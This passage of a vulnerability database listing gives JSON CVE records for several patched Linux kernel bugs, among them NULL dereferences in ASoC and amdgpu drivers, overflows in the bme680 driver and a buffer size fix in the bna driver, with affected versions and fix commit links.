"versionEndExcluding": "5.10.221",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: fsl-asoc-card: set priv-\u003epdev before using it\n\npriv-\u003epdev pointer was set after being used in\nfsl_asoc_card_audmux_init().\nMove this assignment at the start of the probe function, so\nsub-functions can correctly use pdev through priv.\n\nfsl_asoc_card_audmux_init() dereferences priv-\u003epdev to get access to the\ndev struct, used with dev_err macros.\nAs priv is zero-initialised, there would be a NULL pointer dereference.\nNote that if priv-\u003edev is dereferenced before assignment but never used,\nfor example if there is no error to be printed, the driver won\u0027t crash\nprobably due to compiler optimisations."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:45.521Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ae81535ce2503aabc4adab3472f4338070cdeb6a"
},
{
"url": "https://git.kernel.org/stable/c/8896e18b7c366f8faf9344abfd0971435f1c723a"
},
{
"url": "https://git.kernel.org/stable/c/3662eb2170e59b58ad479982dc1084889ba757b9"
},
{
"url": "https://git.kernel.org/stable/c/544ab46b7ece6d6bebbdee5d5659c0a0f804a99a"
},
{
"url": "https://git.kernel.org/stable/c/8faf91e58425c2f6ce773250dfd995f1c2d461ac"
},
{
"url": "https://git.kernel.org/stable/c/29bc9e7c75398b0d12fc30955f2e9b2dd29ffaed"
},
{
"url": "https://git.kernel.org/stable/c/7c18b4d89ff9c810b6e562408afda5ce165c4ea6"
},
{
"url": "https://git.kernel.org/stable/c/90f3feb24172185f1832636264943e8b5e289245"
}
],
"title": "ASoC: fsl-asoc-card: set priv-\u003epdev before using it",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42089",
"datePublished": "2024-07-29T16:26:29.288Z",
"dateReserved": "2024-07-29T15:50:41.171Z",
"dateUpdated": "2025-05-04T09:22:45.521Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42086 (GCVE-0-2024-42086)
Vulnerability from cvelistv5
Published
2024-07-29 16:26
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iio: chemical: bme680: Fix overflows in compensate() functions
There are cases in the compensate functions of the driver that
there could be overflows of variables due to bit shifting ops.
These implications were initially discussed here [1] and they
were mentioned in log message of Commit 1b3bd8592780 ("iio:
chemical: Add support for Bosch BME680 sensor").
[1]: https://lore.kernel.org/linux-iio/20180728114028.3c1bbe81@archlinux/
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1b3bd8592780c87c5eddabbe98666b086bbaee36 Version: 1b3bd8592780c87c5eddabbe98666b086bbaee36 Version: 1b3bd8592780c87c5eddabbe98666b086bbaee36 Version: 1b3bd8592780c87c5eddabbe98666b086bbaee36 Version: 1b3bd8592780c87c5eddabbe98666b086bbaee36 Version: 1b3bd8592780c87c5eddabbe98666b086bbaee36 Version: 1b3bd8592780c87c5eddabbe98666b086bbaee36 Version: 1b3bd8592780c87c5eddabbe98666b086bbaee36 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:31.959Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6fa31bbe2ea8665ee970258eb8320cbf231dbe9e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b0af334616ed425024bf220adda0f004806b5feb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c326551e99f5416986074ce78bef94f6a404b517"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a13d1357658d3a3c1cd7b3b9543c805a6e5e6e9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ba1bb3e2a38a7fef1c1818dd4f2d9abbfdde553a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b5967393d50e3c6e632efda3ea3fdde14c1bfd0e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3add41bbda92938e9a528d74659dfc552796be4e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fdd478c3ae98c3f13628e110dce9b6cfb0d9b3c8"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42086",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:18:54.149750Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:56.982Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iio/chemical/bme680_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6fa31bbe2ea8665ee970258eb8320cbf231dbe9e",
"status": "affected",
"version": "1b3bd8592780c87c5eddabbe98666b086bbaee36",
"versionType": "git"
},
{
"lessThan": "b0af334616ed425024bf220adda0f004806b5feb",
"status": "affected",
"version": "1b3bd8592780c87c5eddabbe98666b086bbaee36",
"versionType": "git"
},
{
"lessThan": "c326551e99f5416986074ce78bef94f6a404b517",
"status": "affected",
"version": "1b3bd8592780c87c5eddabbe98666b086bbaee36",
"versionType": "git"
},
{
"lessThan": "7a13d1357658d3a3c1cd7b3b9543c805a6e5e6e9",
"status": "affected",
"version": "1b3bd8592780c87c5eddabbe98666b086bbaee36",
"versionType": "git"
},
{
"lessThan": "ba1bb3e2a38a7fef1c1818dd4f2d9abbfdde553a",
"status": "affected",
"version": "1b3bd8592780c87c5eddabbe98666b086bbaee36",
"versionType": "git"
},
{
"lessThan": "b5967393d50e3c6e632efda3ea3fdde14c1bfd0e",
"status": "affected",
"version": "1b3bd8592780c87c5eddabbe98666b086bbaee36",
"versionType": "git"
},
{
"lessThan": "3add41bbda92938e9a528d74659dfc552796be4e",
"status": "affected",
"version": "1b3bd8592780c87c5eddabbe98666b086bbaee36",
"versionType": "git"
},
{
"lessThan": "fdd478c3ae98c3f13628e110dce9b6cfb0d9b3c8",
"status": "affected",
"version": "1b3bd8592780c87c5eddabbe98666b086bbaee36",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iio/chemical/bme680_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: chemical: bme680: Fix overflows in compensate() functions\n\nThere are cases in the compensate functions of the driver that\nthere could be overflows of variables due to bit shifting ops.\nThese implications were initially discussed here [1] and they\nwere mentioned in log message of Commit 1b3bd8592780 (\"iio:\nchemical: Add support for Bosch BME680 sensor\").\n\n[1]: https://lore.kernel.org/linux-iio/20180728114028.3c1bbe81@archlinux/"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:40.616Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6fa31bbe2ea8665ee970258eb8320cbf231dbe9e"
},
{
"url": "https://git.kernel.org/stable/c/b0af334616ed425024bf220adda0f004806b5feb"
},
{
"url": "https://git.kernel.org/stable/c/c326551e99f5416986074ce78bef94f6a404b517"
},
{
"url": "https://git.kernel.org/stable/c/7a13d1357658d3a3c1cd7b3b9543c805a6e5e6e9"
},
{
"url": "https://git.kernel.org/stable/c/ba1bb3e2a38a7fef1c1818dd4f2d9abbfdde553a"
},
{
"url": "https://git.kernel.org/stable/c/b5967393d50e3c6e632efda3ea3fdde14c1bfd0e"
},
{
"url": "https://git.kernel.org/stable/c/3add41bbda92938e9a528d74659dfc552796be4e"
},
{
"url": "https://git.kernel.org/stable/c/fdd478c3ae98c3f13628e110dce9b6cfb0d9b3c8"
}
],
"title": "iio: chemical: bme680: Fix overflows in compensate() functions",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42086",
"datePublished": "2024-07-29T16:26:27.075Z",
"dateReserved": "2024-07-29T15:50:41.170Z",
"dateUpdated": "2025-05-04T09:22:40.616Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52908 (GCVE-0-2023-52908)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 12:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: Fix potential NULL dereference
Fix potential NULL dereference, in the case when "man", the resource manager
might be NULL, when/if we print debug information.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52908",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:05.312816Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:13.328Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_object.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f2faf0699af78968a27ca154bf76e94247f8c471",
"status": "affected",
"version": "8ba7c55e112f4ffd2a95b99be1cb1c891ef08ba1",
"versionType": "git"
},
{
"lessThan": "0be7ed8e7eb15282b5d0f6fdfea884db594ea9bf",
"status": "affected",
"version": "7554886daa31eacc8e7fac9e15bbce67d10b8f1f",
"versionType": "git"
},
{
"status": "affected",
"version": "80546eef216854a7bd47e39e828f04b406c00599",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_object.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.1.7",
"status": "affected",
"version": "6.1.5",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "6.1.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.0.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Fix potential NULL dereference\n\nFix potential NULL dereference, in the case when \"man\", the resource manager\nmight be NULL, when/if we print debug information."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:49:49.777Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f2faf0699af78968a27ca154bf76e94247f8c471"
},
{
"url": "https://git.kernel.org/stable/c/0be7ed8e7eb15282b5d0f6fdfea884db594ea9bf"
}
],
"title": "drm/amdgpu: Fix potential NULL dereference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52908",
"datePublished": "2024-08-21T06:10:49.223Z",
"dateReserved": "2024-08-21T06:07:11.015Z",
"dateUpdated": "2025-05-04T12:49:49.777Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43839 (GCVE-0-2024-43839)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bna: adjust 'name' buf size of bna_tcb and bna_ccb structures
To have enough space to write all possible sprintf() args. Currently
'name' size is 16, but the first '%s' specifier may already need at
least 16 characters, since 'bnad->netdev->name' is used there.
For '%d' specifiers, assume that they require:
* 1 char for 'tx_id + tx_info->tcb[i]->id' sum, BNAD_MAX_TXQ_PER_TX is 8
* 2 chars for 'rx_id + rx_info->rx_ctrl[i].ccb->id', BNAD_MAX_RXP_PER_RX
is 16
And replace sprintf with snprintf.
Detected using the static analysis tool - Svace.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 8b230ed8ec96c933047dd0625cf95f739e4939a6 Version: 8b230ed8ec96c933047dd0625cf95f739e4939a6 Version: 8b230ed8ec96c933047dd0625cf95f739e4939a6 Version: 8b230ed8ec96c933047dd0625cf95f739e4939a6 Version: 8b230ed8ec96c933047dd0625cf95f739e4939a6 Version: 8b230ed8ec96c933047dd0625cf95f739e4939a6 Version: 8b230ed8ec96c933047dd0625cf95f739e4939a6 Version: 8b230ed8ec96c933047dd0625cf95f739e4939a6 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43839",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:08:02.344125Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:22.797Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/brocade/bna/bna_types.h",
"drivers/net/ethernet/brocade/bna/bnad.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f121740f69eda4da2de9a20a6687a13593e72540",
"status": "affected",
"version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
"versionType": "git"
},
{
"lessThan": "c90b1cd7758fd4839909e838ae195d19f8065d76",
"status": "affected",
"version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
"versionType": "git"
},
{
"lessThan": "6ce46045f9b90d952602e2c0b8886cfadf860bf1",
"status": "affected",
"version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
"versionType": "git"
},
{
"lessThan": "6d20c4044ab4d0e6a99aa35853e66f0aed5589e3",
"status": "affected",
"version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
"versionType": "git"
},
{
"lessThan": "ab748dd10d8742561f2980fea08ffb4f0cacfdef",
"status": "affected",
"version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
"versionType": "git"
},
{
"lessThan": "b0ff0cd0847b03c0a0abe20cfa900eabcfcb9e43",
"status": "affected",
"version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
"versionType": "git"
},
{
"lessThan": "e0f48f51d55fb187400e9787192eda09fa200ff5",
"status": "affected",
"version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
"versionType": "git"
},
{
"lessThan": "c9741a03dc8e491e57b95fba0058ab46b7e506da",
"status": "affected",
"version": "8b230ed8ec96c933047dd0625cf95f739e4939a6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/brocade/bna/bna_types.h",
"drivers/net/ethernet/brocade/bna/bnad.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.37"
},
{
"lessThan": "2.6.37",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "2.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "2.6.37",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbna: adjust \u0027name\u0027 buf size of bna_tcb and bna_ccb structures\n\nTo have enough space to write all possible sprintf() args. Currently\n\u0027name\u0027 size is 16, but the first \u0027%s\u0027 specifier may already need at\nleast 16 characters, since \u0027bnad-\u003enetdev-\u003ename\u0027 is used there.\n\nFor \u0027%d\u0027 specifiers, assume that they require:\n * 1 char for \u0027tx_id + tx_info-\u003etcb[i]-\u003eid\u0027 sum, BNAD_MAX_TXQ_PER_TX is 8\n * 2 chars for \u0027rx_id + rx_info-\u003erx_ctrl[i].ccb-\u003eid\u0027, BNAD_MAX_RXP_PER_RX\n is 16\n\nAnd replace sprintf with snprintf.\n\nDetected using the static analysis tool - Svace."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:24.820Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f121740f69eda4da2de9a20a6687a13593e72540"
},
{
"url": "https://git.kernel.org/stable/c/c90b1cd7758fd4839909e838ae195d19f8065d76"
},
{
"url": "https://git.kernel.org/stable/c/6ce46045f9b90d952602e2c0b8886cfadf860bf1"
},
{
"url": "https://git.kernel.org/stable/c/6d20c4044ab4d0e6a99aa35853e66f0aed5589e3"
},
{
"url": "https://git.kernel.org/stable/c/ab748dd10d8742561f2980fea08ffb4f0cacfdef"
},
{
"url": "https://git.kernel.org/stable/c/b0ff0cd0847b03c0a0abe20cfa900eabcfcb9e43"
},
{
"url": "https://git.kernel.org/stable/c/e0f48f51d55fb187400e9787192eda09fa200ff5"
},
{
"url": "https://git.kernel.org/stable/c/c9741a03dc8e491e57b95fba0058ab46b7e506da"
}
],
"title": "bna: adjust \u0027name\u0027 buf size of bna_tcb and bna_ccb structures",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43839",
"datePublished": "2024-08-17T09:21:55.085Z",
"dateReserved": "2024-08-17T09:11:59.274Z",
"dateUpdated": "2025-05-04T09:27:24.820Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43818 (GCVE-0-2024-43818)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ASoC: amd: Adjust error handling in case of absent codec device
acpi_get_first_physical_node() can return NULL in several cases (no such
device, ACPI table error, reference count drop to 0, etc).
Existing check just emit error message, but doesn't perform return.
Then this NULL pointer is passed to devm_acpi_dev_add_driver_gpios()
where it is dereferenced.
Adjust this error handling by adding error code return.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43818",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:09.791728Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:25.328Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/soc/amd/acp-es8336.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1ba9856cf7f6492b47c1edf853137f320d583db5",
"status": "affected",
"version": "02527c3f2300100a25524c8c020d98c7957e485e",
"versionType": "git"
},
{
"lessThan": "99b642dac24f6d09ba3ebf1d690be8aefff86164",
"status": "affected",
"version": "02527c3f2300100a25524c8c020d98c7957e485e",
"versionType": "git"
},
{
"lessThan": "b1173d64edd276c957b6d09e1f971c85b38f1519",
"status": "affected",
"version": "02527c3f2300100a25524c8c020d98c7957e485e",
"versionType": "git"
},
{
"lessThan": "5080808c3339de2220c602ab7c7fa23dc6c1a5a3",
"status": "affected",
"version": "02527c3f2300100a25524c8c020d98c7957e485e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/soc/amd/acp-es8336.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: amd: Adjust error handling in case of absent codec device\n\nacpi_get_first_physical_node() can return NULL in several cases (no such\ndevice, ACPI table error, reference count drop to 0, etc).\nExisting check just emit error message, but doesn\u0027t perform return.\nThen this NULL pointer is passed to devm_acpi_dev_add_driver_gpios()\nwhere it is dereferenced.\n\nAdjust this error handling by adding error code return.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:56.750Z",
